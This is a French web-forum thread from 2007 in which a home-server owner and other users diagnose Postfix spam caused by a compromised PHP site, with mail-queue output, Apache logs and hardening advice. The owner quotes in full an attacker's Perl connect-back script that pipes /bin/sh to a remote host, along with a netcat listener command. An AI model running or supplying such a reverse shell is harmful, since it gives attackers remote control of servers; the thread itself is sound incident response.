  151. postfix  28858  1.3  1.6   7140  2060 ?        S    10:06   0:00 cleanup -z -t unix -u -c
  152. postfix  28859  1.5  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  153. postfix  28860  3.0  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  154. postfix  28861  0.0  1.4   4880  1812 ?        S    10:06   0:00 smtp -t unix -u -c
  155. root     28862  0.0  0.7   2460   932 pts/0    R+   10:06   0:00 ps aux
  156. postfix  28863  0.0  1.2   4876  1644 ?        S    10:06   0:00 smtp -t unix -u -c
 

La machine est une vm http://phpsysinfo.leveilleur.net


Message édité par Le Veilleur le 31-05-2007 à 10:14:05

---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°917960
chaced
Posté le 31-05-2007 à 10:15:14  profilanswer
 

ça sent la faille XSS dans une page d'envoi de mail en php...


---------------
CPU-Z | Timespy | Mes bd
n°917962
toniotonio
Posté le 31-05-2007 à 10:16:53  profilanswer
 

verifie la queue de postfix:
mailq
 
 
poste egalement le master.cf
 
de plus tu devrais de toute facon creer l'alias www-data dans ta base.
 
 
 
edit: tu es egalement un peu court en memoire

Message cité 1 fois
Message édité par toniotonio le 31-05-2007 à 10:18:39

---------------
Messagerie dédiée, Relais Mail Antispam/Antivirus, Infogérance 24/7: http://www.eole-its.com
n°917963
Le Veilleu​r
Posté le 31-05-2007 à 10:20:59  profilanswer
 

toniotonio a écrit :

verifie la queue de postfix:
mailq
 
 
poste egalement le master.cf
 
de plus tu devrais de toute facon creer l'alias www-data dans ta base.
 
 
 
edit: tu es egalement un peu court en memoire


J'ai édité pour le master, il est dans le message juste plus haut
 
ALors pour le mailq, j'en ai plein comme cela

Code :
  1. 466C1BA389*    6119 Wed May 30 19:08:05  www-data@leveilleur.net
  2.                                          pipidollys@terra.com.br
  3. 4806DBA3DD*    6117 Wed May 30 19:08:09  www-data@leveilleur.net
  4.                                          rosaneaf@terra.com.br
  5. 4489ABA74E*    6115 Wed May 30 19:08:47  www-data@leveilleur.net
  6.                                          mduque@terra.com.br
  7. 439AFBA3F3*    6126 Wed May 30 19:08:10  www-data@leveilleur.net
  8.                                          livrariamonquelat@terra.com.br
  9. 42C57BA568*    6117 Wed May 30 19:08:26  www-data@leveilleur.net
  10.                                          funaipva@terra.com.br
  11. 45FA8BAF6A*    6116 Wed May 30 19:10:48  www-data@leveilleur.net
  12.                                          tom.and@terra.com.br
  13. 48EB7BAD4A*    6120 Wed May 30 19:09:55  www-data@leveilleur.net
  14.                                          ceapees.vix@terra.com.br
  15. 4C1B656074*    6117 Wed May 30 19:29:06  www-data@leveilleur.net
  16.                                          oablages@terra.com.br
  17. 43A91BAECA*    6116 Wed May 30 19:10:40  www-data@leveilleur.net
  18.                                          sorayeb@terra.com.br
  19. 4043ABADAA*    6116 Wed May 30 19:10:00  www-data@leveilleur.net
  20.                                          hmtroia@terra.com.br
  21. 4FDD4558BF*    6128 Wed May 30 19:10:26  www-data@leveilleur.net
  22.                                          mailtvivendacrianca@terra.com.br
  23. 112E2BA9FF*    6118 Wed May 30 19:09:19  www-data@leveilleur.net
  24.                                          miltonita@terra.com.br
  25. 4CF3D55857*    6117 Wed May 30 19:10:17  www-data@leveilleur.net
  26.                                          angelggc@terra.com.br
  27. 1AB9FBAA00*    6123 Wed May 30 19:09:19  www-data@leveilleur.net
  28.                                          mariasilviagfh@terra.com.br
  29. 4DCAC55895*    6115 Wed May 30 19:10:23  www-data@leveilleur.net
  30.                                          vikmar@terra.com.br
  31. 4500255FF5*    6116 Wed May 30 19:28:58  www-data@leveilleur.net
  32.                                          naville@terra.com.br
  33. 167BABAA45*    6115 Wed May 30 19:09:22  www-data@leveilleur.net
  34.                                          drazia@terra.com.br
  35. 119A15588F*    6121 Wed May 30 19:10:24  www-data@leveilleur.net
  36.                                          aurorazaiden@terra.com.br


 
La je viens de couper apache, et j'ai fait une alias www-data@leveilleur.net et c'est plein de spam
 

Code :
  1. This is the mail system at host leveilleur.net.
  2. I'm sorry to have to inform you that your message could not be delivered to one or more recipients. It's attached below.
  3. For further assistance, please send mail to postmaster.
  4. If you do so, please include this problem report. You can delete your own text from the attached returned message.
  5.                    The mail system
  6. <cidanicoletti@globo.com>: host mx.globo.com[64.97.153.5] said: 550 RCPT
  7.     TO:<cidanicoletti@globo.com> User unknown (in reply to RCPT TO command)


 
Et un beau spam est joint à cela


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°917965
Le Veilleu​r
Posté le 31-05-2007 à 10:22:48  profilanswer
 

pour la mémoire, c'est une serveur@home et normalement, c'est largement suffisant, mais là depuis 3 jours, il s'en prend plein la poire.
 
Depuis que j'ai coupé apache, ca a l'air d'être mieux niveau charge serveur, ca diminue. Je pense provisoirement desactiver la fonction mail dans apache (faut que je cherche cmt) et également comment virer tous les mails du mailq.
 


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°917966
chaced
Posté le 31-05-2007 à 10:24:17  profilanswer
 

Le Veilleur a écrit :

pour la mémoire, c'est une serveur@home et normalement, c'est largement suffisant, mais là depuis 3 jours, il s'en prend plein la poire.
 
Depuis que j'ai coupé apache, ca a l'air d'être mieux niveau charge serveur, ca diminue. Je pense provisoirement desactiver la fonction mail dans apache (faut que je cherche cmt) et également comment virer tous les mails du mailq.


 
Apache n'envoit pas de mail, mais ton php oui, donc verifie tes script php, recherche avec grep dans tes .php la fonction mail( et corrige la.


---------------
CPU-Z | Timespy | Mes bd
n°917967
Le Veilleu​r
Posté le 31-05-2007 à 10:25:30  profilanswer
 

chaced a écrit :

Apache n'envoit pas de mail, mais ton php oui, donc verifie tes script php, recherche avec grep dans tes .php la fonction mail( et corrige la.


La corrigé de cette facon ?  
http://www.webmasterquebec.com/art [...] tion-mail/
 
avec nl2br ?


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°917969
toniotonio
Posté le 31-05-2007 à 10:27:29  profilanswer
 

pour virer les mails de queue:

postsuper -d ALL


 
 
effectivement ton probleme est surement lié a un script sur ton serveur web .  
heberges tu un site ?  
 
en tout cas ton serveur a tout de meme du mal a gerer une augmentation du trafic, mais sur une VM c'a ne m'etonne pas, d'autant plus avec si peu de RAM.
 
 


---------------
Messagerie dédiée, Relais Mail Antispam/Antivirus, Infogérance 24/7: http://www.eole-its.com
mood
Publicité
Posté le 31-05-2007 à 10:27:29  profilanswer
 

n°917970
Le Veilleu​r
Posté le 31-05-2007 à 10:32:59  profilanswer
 

toniotonio a écrit :

pour virer les mails de queue:

postsuper -d ALL


 
 
effectivement ton probleme est surement lié a un script sur ton serveur web .  
heberges tu un site ?  
 
en tout cas ton serveur a tout de meme du mal a gerer une augmentation du trafic, mais sur une VM c'a ne m'etonne pas, d'autant plus avec si peu de RAM.


Merci, il vient d'effacer plus de 100 000 messages :)
Oui, c'est certain, il ne gère pas très bien les montées en traffic, mais pour un petit @home, c'est suffistant
 
Oui, j'héberge 3 sites internet et je cherche comment protéger les fonctions mail


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°917971
chaced
Posté le 31-05-2007 à 10:36:00  profilanswer
 


 
Apres les utilisateur vont avoir des br au milieu de leur message, ça va faire style...
 
Voila comment je controle sur mon site, ce n'est qu'un exemple on peut l'amélioré grandement.
 
 
Le sujet dans la fonction mail est controlé avec strctrl("monsujet" )
Le message du mail est controlé avec strctrl("lemessage du mail",1)
 

Code :
  1. function EmailOK($email) {
  2.       if(preg_match("/^[0-9a-z_]([-_.]?[0-9a-z])*@[0-9a-z][-.0-9a-z]*\\.[a-z]{2,3}[.]?$/",$email))
  3.       {
  4.      $host = substr(strstr($email, '@'), 1);
  5. if($host=='asrockfrance.com') return FALSE; // le domaine ou se trouve le serveur
  6.      if ( getmxrr($host, $validate_email_temp) ) return TRUE;
  7.      if(checkdnsrr($host,"ANY" )) return TRUE;
  8.      return FALSE;
  9.       }
  10.       return FALSE;
  11.   }
  12.   function strctrl($str,$type=0)
  13.   {
  14.    $str=stripslashes(str_replace(array('MIME','bcc:','cc:','multipart','Content-Type'),'#####',$str));
  15. if(!$type)return preg_replace("`\\x00|\\x0a|\\x0d|\\x1a`", "", strtolower($str));
  16. return preg_replace("@^[`\\x00|\\x0a|\\x0d|\\x1a`]+@", "", $str);;
  17.   }
  18. if (isset($_REQUEST["mess"]) && isset($_REQUEST["mail"]) && isset($_REQUEST["subject"]))
  19.     {
  20. $subject=$_REQUEST["subject"];
  21. $mail=strtolower($_REQUEST["mail"]);
  22.         $mess="IP : ".$_SERVER['REMOTE_ADDR']."\n".$_REQUEST["mess"];
  23.         if (EmailOK($mail))
  24.         {
  25.             //Envoi du mail
  26.             $ent="From: ".$mail." \n";
  27.             $ent.="Reply-to: ".$mail." \n";
  28.             @mail("emaildudestinataire@toto.com","AsrockFrance : ".strtolower(strctrl($subject)),strctrl($mess,1),$ent);
  29.             echo '<font color="red" size="+1"><b>Message envoy&eacute;</b></font><br />';
  30.             $subject='';
  31.             $mess='';
  32.         }
  33.         else
  34.         {
  35.             echo '<font color="red" size="+1"><b>Email incorrecte</b></font><br />';
  36.     $mess=$_REQUEST["mess"];
  37.         }
  38.     }


 


---------------
CPU-Z | Timespy | Mes bd
n°917973
Le Veilleu​r
Posté le 31-05-2007 à 10:42:37  profilanswer
 

merci pour tes deux fonctions, en attendant de vérifier les sites, n'y aurait-il pas moyen de désactiver la function mail() via apache ? histoire de pouvoir remettre les sites up ?


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°917974
chaced
Posté le 31-05-2007 à 10:44:01  profilanswer
 

Via apache non, via php oui, edite ton php.ini et met en commentaire la ligne qui indique sendmail -t -i (un truc du genre)


---------------
CPU-Z | Timespy | Mes bd
n°917977
Le Veilleu​r
Posté le 31-05-2007 à 10:54:54  profilanswer
 

chaced a écrit :

Via apache non, via php oui, edite ton php.ini et met en commentaire la ligne qui indique sendmail -t -i (un truc du genre)


C'est déjà en commentaire :s
 
http://www.hostipics.net/files/2007-05/31/V1180601487capture.jpg


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°917980
chaced
Posté le 31-05-2007 à 10:59:15  profilanswer
 

tu es sur d'editer le bon php.ini ?
 
Si c'est bien le bon, peut etre que tu utilises des CGI ?


---------------
CPU-Z | Timespy | Mes bd
n°917981
Le Veilleu​r
Posté le 31-05-2007 à 11:01:23  profilanswer
 

chaced a écrit :

tu es sur d'editer le bon php.ini ?
 
Si c'est bien le bon, peut etre que tu utilises des CGI ?


Oui, je suis certain que c'est le bon
Configuration File (php.ini) Path  /etc/php5/apache2/php.ini
Non, je n'utilise pas de cgi, en mettant un port bidon, ca va résoudre l'affaire ?


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°917985
chaced
Posté le 31-05-2007 à 11:08:17  profilanswer
 

le port c'est pour windows.
 
Mais si il n'y a pas de sendmail -t -i php ne peut pas envoyer de mail, donc c'est autre chose qui envoit un mail (genre un script perl)


---------------
CPU-Z | Timespy | Mes bd
n°918056
leto
Posté le 31-05-2007 à 14:06:42  profilanswer
 

Si tu commente la ligne dans le php.ini, il va prendre la valeur par défaut (utiliser sendmail en local sur la machine). Et donc tu seras tjours autant spammé.
Corrige tes scripts ou configure ton mta


---------------
--
n°918058
chaced
Posté le 31-05-2007 à 14:14:54  profilanswer
 

ben voila il n'a qu'a mettre /dev/null comme serveur mail dans le php.ini :D


---------------
CPU-Z | Timespy | Mes bd
n°922205
Le Veilleu​r
Posté le 12-06-2007 à 07:51:58  profilanswer
 

chaced a écrit :

ben voila il n'a qu'a mettre /dev/null comme serveur mail dans le php.ini :D


Ca a fonctionné pendant un petit temps, et voilà qu'a nouveau plein de mail partent de mon serveur. là je ne comprends plus rien... Y a pas un moyen pour interdire cette fonction mail ?
 
merci


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°922260
e_esprit
Posté le 12-06-2007 à 11:02:26  profilanswer
 

Ben tu vires ton script qui sert à envoyer des mails tout simplement :heink:


---------------
Ce n'est point ma façon de penser qui a fait mon malheur, c'est celle des autres.
n°922285
Le Veilleu​r
Posté le 12-06-2007 à 11:43:05  profilanswer
 

e_esprit a écrit :

Ben tu vires ton script qui sert à envoyer des mails tout simplement :heink:


Le truc c'est que je dois me taper le code (mal fait) de 4 à 5 sites qui ne sont pas de moi. La solution simple pour moi serait de bloquer la fonction mail, d'envoyer un exemple de correction à chaque prorio et de leur demander de faire les modifs.


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°922307
chaced
Posté le 12-06-2007 à 12:44:47  profilanswer
 

essai de mettre safe_mode = on au lieu de off
Ils seront vachement limité mais ça permet d'avoir un serveur bien plus controlé si tu ne maîtrises pas le code des utilisateurs.

 

Sinon pour ta question,
disable_functions = mail


Message édité par chaced le 12-06-2007 à 12:46:31

---------------
CPU-Z | Timespy | Mes bd
n°922313
Le Veilleu​r
Posté le 12-06-2007 à 12:53:25  profilanswer
 

merci :jap:


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°922315
chaced
Posté le 12-06-2007 à 12:56:28  profilanswer
 

La si ils continuent a spamer, c'est que il y a une autre faille :D


---------------
CPU-Z | Timespy | Mes bd
n°922321
Le Veilleu​r
Posté le 12-06-2007 à 13:07:05  profilanswer
 

chaced a écrit :

La si ils continuent a spamer, c'est que il y a une autre faille :D


Je vais ternir cela a l'oeil. Après les premières modifs, j'ai eu une dizaine de jours sans soucis et là, ça a repris aujourd'hui à 4h00.
 
De plus, j'ai déjà une reçu une plainte de mon Fai pour spam sur ma connexion :(


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°922323
chaced
Posté le 12-06-2007 à 13:09:23  profilanswer
 

passe en safemode ça va résoudre pas mal de truc je pense :)


---------------
CPU-Z | Timespy | Mes bd
n°922331
e_esprit
Posté le 12-06-2007 à 13:27:27  profilanswer
 

Le Veilleur a écrit :

Je vais ternir cela a l'oeil. Après les premières modifs, j'ai eu une dizaine de jours sans soucis et là, ça a repris aujourd'hui à 4h00.
 
De plus, j'ai déjà une reçu une plainte de mon Fai pour spam sur ma connexion :(


Ben tu regardes les logs de ton serveur Apache, tu trouves la/les page(s) qui posent souci, tu enlèves les droits de lecture dessus, et après tu discutes avec le développeur/propriétaire du site.


---------------
Ce n'est point ma façon de penser qui a fait mon malheur, c'est celle des autres.
n°922468
Le Veilleu​r
Posté le 12-06-2007 à 17:10:48  profilanswer
 

Alors dans les access d'apache, je vois ceci de bizarre
 

Code :
  1. 189.13.242.2 - - [12/Jun/2007:03:42:08 +0200] "POST /db//xmlrpc.php HTTP/1.1" 200 159 "-" "-"
  2. 189.13.242.2 - - [12/Jun/2007:03:16:48 +0200] "POST /db//xmlrpc.php HTTP/1.1" 200 13 "-" "-"
  3. 201.43.183.114 - - [12/Jun/2007:04:01:51 +0200] "POST /db//xmlrpc.php HTTP/1.1" 200 213 "-" "-"
  4. 65.54.241.68 - - [12/Jun/2007:04:22:19 +0200] "POST http://65.54.201.60:25/ HTTP/1.0" 404 322 "-" "-"
  5. 65.54.241.68 - - [12/Jun/2007:04:22:12 +0200] "POST http://65.54.201.60:25/ HTTP/1.0" 404 322 "-" "-"
  6. 65.54.241.68 - - [12/Jun/2007:04:22:23 +0200] "POST http://65.54.201.60:25/ HTTP/1.0" 404 322 "-" "-"


 
Xmlrpc.php est une page d'un site phpnuke que je suis obligé d'héberger.
 
 
Sinon, dans les erreur.log, y a ca de très très étrange
 
http://www.hostipics.net/files/2007-06/12/V1181660613capture.jpg
 
Et la, y  un back.txt
http://www.fenomena.info/xpl/back.txt
 

Code :
  1. #!/usr/bin/perl
  2. # Penggunaan:
  3. # 1) Ketik perintah di shell kamu untuk menerima. contoh: ./nc -l -v -p 8999
  4. # 2) Remote Port. perl back.txt (ipshell) (port). contoh: perl back.txt 192.168.0.1 8999
  5. use Socket;
  6. $lihat="Connect Back By: irvian\n\n";
  7. $cmd= "lpd";
  8. $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
  9. $0=$cmd;
  10. $target=$ARGV[0];
  11. $port=$ARGV[1];
  12. $iaddr=inet_aton($target) || die("Error: $!\n" );
  13. $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n" );
  14. $proto=getprotobyname('tcp');
  15. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n" );
  16. connect(SOCKET, $paddr) || die("Error: $!\n" );
  17. open(STDIN, ">&SOCKET" );
  18. open(STDOUT, ">&SOCKET" );
  19. open(STDERR, ">&SOCKET" );
  20. print STDOUT $lihat;
  21. system($system);
  22. close(STDIN);
  23. close(STDOUT);
  24. close(STDERR)


 
Comment arrive t il a exécuter cela sur mon serveur grrrrrrrrrrrr


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°922471
e_esprit
Posté le 12-06-2007 à 17:18:23  profilanswer
 

Oh le joli hack !!!!!!!!!!!!!!!
 
Et une backdoor, une !
 
Vive les applis PHP [:fatidik972]


Message édité par e_esprit le 12-06-2007 à 17:19:10

---------------
Ce n'est point ma façon de penser qui a fait mon malheur, c'est celle des autres.
n°922473
Le Veilleu​r
Posté le 12-06-2007 à 17:21:04  profilanswer
 

mais par ou passe t il ? Pas moyen de trouver, et puis, le telechargement du fichier back.txt se trouve dans le erreur log. Help :'(


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°922475
e_esprit
Posté le 12-06-2007 à 17:24:01  profilanswer
 

Ben deja liste tes process, verifies qu'il ne tourne pas.
Ensuite arrete ton apache.
Regarde si d'autres port sont ouverts (netstat -taup).
 
Il est surement passé par une merde dans un code PHP (genre un include moisi, un system exec...).


---------------
Ce n'est point ma façon de penser qui a fait mon malheur, c'est celle des autres.
n°922478
Le Veilleu​r
Posté le 12-06-2007 à 17:34:32  profilanswer
 

srvlinux01:~# ps aux | grep www-data
www-data  2814  0.1  7.3  23696  9356 ?        S    17:31   0:00 /usr/sbin/apache2 -k start
www-data  2815  0.0  6.9  23688  8844 ?        S    17:31   0:00 /usr/sbin/apache2 -k start
www-data  2817  0.8  7.9  23872 10152 ?        S    17:31   0:00 /usr/sbin/apache2 -k start
www-data  2818  0.0  6.9  23688  8832 ?        S    17:31   0:00 /usr/sbin/apache2 -k start
www-data  2819  0.0  7.4  23696  9428 ?        S    17:31   0:00 /usr/sbin/apache2 -k start
www-data  2820  0.2  7.3  23696  9360 ?        S    17:31   0:00 /usr/sbin/apache2 -k start
www-data  2821  0.1  6.9  23688  8848 ?        S    17:31   0:00 /usr/sbin/apache2 -k start
www-data  2823  0.0  6.9  23688  8832 ?        S    17:32   0:00 /usr/sbin/apache2 -k start
www-data  2824  0.0  6.9  23688  8836 ?        S    17:32   0:00 /usr/sbin/apache2 -k start
www-data  2825  0.0  7.3  23700  9336 ?        S    17:32   0:00 /usr/sbin/apache2 -k start
www-data  2826  0.0  6.9  23556  8772 ?        S    17:32   0:00 /usr/sbin/apache2 -k start
www-data  2830  0.0  7.3  23700  9336 ?        S    17:32   0:00 /usr/sbin/apache2 -k start
root      2842  0.0  0.4   1872   560 pts/0    R+   17:32   0:00 grep www-data


 
Rien de bizarre
 

srvlinux01:~# netstat -taup
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 localhost.localdo:mysql *:*                     LISTEN     2349/mysqld
tcp        0      0 *:netbios-ssn           *:*                     LISTEN     2621/smbd
tcp        0      0 localhost.localdo:spamd *:*                     LISTEN     2416/spamd.pid
tcp        0      0 srvlinux01.leveille:www crawl-66-249-67-2:54425 SYN_RECV   -
tcp        0      0 srvlinux01.levei:domain *:*                     LISTEN     2276/named
tcp        0      0 localhost.locald:domain *:*                     LISTEN     2276/named
tcp        0      0 *:smtp                  *:*                     LISTEN     2604/master
tcp        0      0 localhost.localdoma:953 *:*                     LISTEN     2276/named
tcp        0      0 *:microsoft-ds          *:*                     LISTEN     2621/smbd
tcp        0      0 srvlinux01.leveill:smtp 200.216.190.2:46920     ESTABLISHED2831/smtpd
tcp        0      0 srvlinux01.leveill:smtp panthro2.qualityw:41758 ESTABLISHED2827/smtpd
tcp        0      0 srvlinux01.leveill:smtp 200.196.239.3:47395     TIME_WAIT  -
tcp        0      0 srvlinux01.leveill:smtp 200.188.218.83:27204    TIME_WAIT  -
tcp        0      0 srvlinux01.leveill:smtp 193.212.97.163:2212     ESTABLISHED-
tcp        0      0 srvlinux01.leveill:smtp 200.196.239.3:47395     TIME_WAIT  -
tcp        0      0 srvlinux01.leveill:smtp 200.188.218.83:27204    TIME_WAIT  -
tcp        0      0 localhost.localdom:1027 localhost.localdo:mysql TIME_WAIT  -
tcp        0      0 localhost.localdom:1028 localhost.localdo:mysql TIME_WAIT  -
tcp        0      0 localhost.localdom:1029 localhost.localdo:mysql TIME_WAIT  -
tcp6       0      0 *:pop3                  *:*                     LISTEN     2522/couriertcpd
tcp6       0      0 *:imap2                 *:*                     LISTEN     2512/couriertcpd
tcp6       0      0 *:www                   *:*                     LISTEN     2711/apache2
tcp6       0      0 *:domain                *:*                     LISTEN     2276/named
tcp6       0      0 *:ssh                   *:*                     LISTEN     2638/sshd
tcp6       0      0 ip6-localhost:953       *:*                     LISTEN     2276/named
tcp6       0      0 *:https                 *:*                     LISTEN     2711/apache2
tcp6       0      0 srvlinux01.leveille:www pro75-4-82-238-201:4771 TIME_WAIT  -
tcp6       0      0 srvlinux01.leveille:www davis.lmd.jussieu:35568 ESTABLISHED-
tcp6       0      0 srvlinux01.leveille:www ip-15.net-82-216-:33180 TIME_WAIT  -
tcp6       0      0 srvlinux01.leveille:www davis.lmd.jussieu:35566 TIME_WAIT  -
tcp6       0      0 srvlinux01.leveille:www ::ffff:84.4.198.3:1830  ESTABLISHED-
tcp6       0    148 srvlinux01.leveille:ssh aspirevista.levei:56221 ESTABLISHED2833/0
tcp6       0      0 srvlinux01.leveille:www davis.lmd.jussieu:35566 TIME_WAIT  -
tcp6       0      0 srvlinux01.leveille:www ::ffff:84.4.198.3:1830  FIN_WAIT2  -
tcp6       0    148 srvlinux01.leveille:ssh aspirevista.levei:56221 ESTABLISHED2833/0
udp        0      0 *:1024                  *:*                                2276/named
udp        0      0 srvlinux01.l:netbios-ns *:*                                2614/nmbd
udp        0      0 *:netbios-ns            *:*                                2614/nmbd
udp        0      0 srvlinux01.:netbios-dgm *:*                                2614/nmbd
udp        0      0 *:netbios-dgm           *:*                                2614/nmbd
udp        0      0 localhost.localdom:snmp *:*                                2631/snmpd
udp        0      0 srvlinux01.levei:domain *:*                                2276/named
udp        0      0 localhost.locald:domain *:*                                2276/named
udp6       0   1216 *:1025                  *:*                                2276/named
udp6       0      0 *:domain                *:*                                2276/named
srvlinux01:~#


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°922480
e_esprit
Posté le 12-06-2007 à 17:41:40  profilanswer
 

Cherche dans le access.log quelle page ont été appelées aux environs de 03:16:49 ce matin. Tu trouveras vite la coupable (c'est souvent des failles sur des applis connus qui sont utilisées, comme phpBB, plume, et phpNuke n'est surement pas exempt de ce type de faille).
Eensuite voit via quelle adresse les accès à ces pages ont pu être fait.
Puis cherche ensuite ces adresses dans les logs... etc.


---------------
Ce n'est point ma façon de penser qui a fait mon malheur, c'est celle des autres.
n°922482
Le Veilleu​r
Posté le 12-06-2007 à 17:51:53  profilanswer
 

J'ai bien une connexion à cet heure là, mais pas moyen de voir ou elle mène, elle appelle la page robots.txt
http://www.hostipics.net/files/2007-06/12/V1181663432capture.jpg


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
n°922485
chaced
Posté le 12-06-2007 à 18:04:30  profilanswer
 

Le Veilleur a écrit :

 

Comment arrive t il a exécuter cela sur mon serveur grrrrrrrrrrrr

 

facile, comme en perl...

 

`uname -a &>/dev/stdout`;

 

:lol:

 

Soit tu bride l'utilisateur www-data, soit tu passe en safemode.

Message cité 1 fois
Message édité par chaced le 12-06-2007 à 18:05:48

---------------
CPU-Z | Timespy | Mes bd
n°922486
e_esprit
Posté le 12-06-2007 à 18:05:12  profilanswer
 

Tous les sites sont loggués dans le meme fichier ?


---------------
Ce n'est point ma façon de penser qui a fait mon malheur, c'est celle des autres.
n°922524
dnlilas
Posté le 12-06-2007 à 20:57:10  profilanswer
 

Apparemment ton serveur est compromis par une attaque.
 
Quelques idées :
 
1) Vérifier le directory /tmp pour voir s'il y a des fichiers suspects, donner la liste avec leur owner/group date etc.... (ls -l). La plupart des backdoors ou trojan sont créés dans ce directory sous le uid d'Apache. Normalement dans ce directory il ne devrait y avoir que les fichiers temporaries de sessions de PHP.
 
2) T'assurer que ton php.ini ne permet pas l'ouverture d'URL à distance
(par exemple ne pas permettre l'exécution de ce fameux back.txt qui n'est d'autre qu'un script Perl déguisé :
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = Off
 
3) Surveiller s'il y a des nouveaux ports en écoute (LISTEN), en particulier le port 8999 qui semble utilisé par le backdoor via netcat (voir ci-dessous).
 
4) La faille vient souvent d'une faille du code de forum (phpBB etc...) ou autre qui permet l'upload des fichiers images (mais qui sont des scripts php déguisés, par exemple toto.php.jpg). Vérifier attentivement les chmod des directories.
 
5) Le log d'Apache montre qu'il a un shell installé qui tente d'appeler fetch, wget, curl etc... pour télécharger des modules venant d'ailleurs.
Il est fortement conseillé de mettre tous ces exécutables en attribut 700 sous le compte root pour éviter les problèmes de sécurité.
 
6) Le safe_mode à OFF pour php est évidemment conseillé, à voir si le code hébergé (forum etc...) le permet.
 
7) Appliquer les derniers patchs ou versions de tous les codes connus (phpBB, phpNuke...).
 
8) Le script Perl du hacker parle de netcat (nc -l -v -p 8999). T'assurer que ce processus ne tourne pas et n'existe pas sur ton serveur.
 
9) Upgrader ton serveur Apache au dernier niveau 2.0.59
http://www.apache.org/dist/httpd/CHANGES_2.0


Message édité par dnlilas le 12-06-2007 à 21:21:12
n°922627
Le Veilleu​r
Posté le 13-06-2007 à 09:20:01  profilanswer
 

Merci pour cette réponse très complète.
 
 
1)
srvlinux01:/tmp# ls -ail
total 20
145729 drwxrwxrwt  5 root root 4096 2007-06-13 09:00 .
     2 drwxr-xr-x 21 root root 4096 2007-01-05 17:28 ..
161923 drwxrwxrwt  2 root root 4096 2007-06-12 16:24 .ICE-unix
161925 drwx------  2 root root 4096 2007-06-12 17:42 mc-root
161922 drwxrwxrwt  2 root root 4096 2007-06-12 16:24 .X11-unix
 
2) Je viens de faire la modification dans le php.ini
 
3)
srvlinux01:~# nmap localhost
 
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-06-13 09:03 CEST
Interesting ports on localhost.localdomain (127.0.0.1):
Not shown: 1668 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
783/tcp  open  spamassassin
953/tcp  open  rndc
3306/tcp open  mysql
 
Et depuis l'extérieur seul les ports 80, 25 et 110 sont accéssible.
 
4) J'utilise bien un système d'upload d'image, mais je vérifie bien le type du fichier et ici, je viens de faire une recherche manuelle et aucun fichier déguisé.
 
5) Je n'ai pas les commandes fetch et curl, par contre j'ai mis wget en 700
 
6) Malheureusement, je ne peux pas mettre le safe mode a On, sinon j'ai des scritps qui ne fonctionnent pas.
 
7) J'ai un site phpnuke que je suis obligé de garder, je vais voir si je ne pourrais pas le migrer vers un blog récent et tenu à jour
 
8)srvlinux01:~# ps aux | grep nc
root     15817  0.0  0.4   1872   624 pts/0    S+   09:02   0:00 grep nc
C'est ok de ce coté là
 
9)J'utilise la version Apache/2.2.3


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
mood
Publicité
Posté le   profilanswer
 

 Page :   1  2
Page Précédente

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs
  Logiciels

  [postfix] Spam sans être open relay

 

Sujets relatifs
Utiliser postfix pour renvoyer des mail free vers une autre boite ?probleme postfix avec orange
Postfix + restriction adresse expéditricePostfix + port d'écoute
Modification de l'avis de non distribution de Postfixmigration sarge --> etch+postfix
Utilisation de open LDAPStatistiques de spam
Postfix 2.3.8+authentification mysql.[Regle]Probleme Procmail + Postfix, incomprehensible
Plus de sujets relatifs à : [postfix] Spam sans être open relay


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR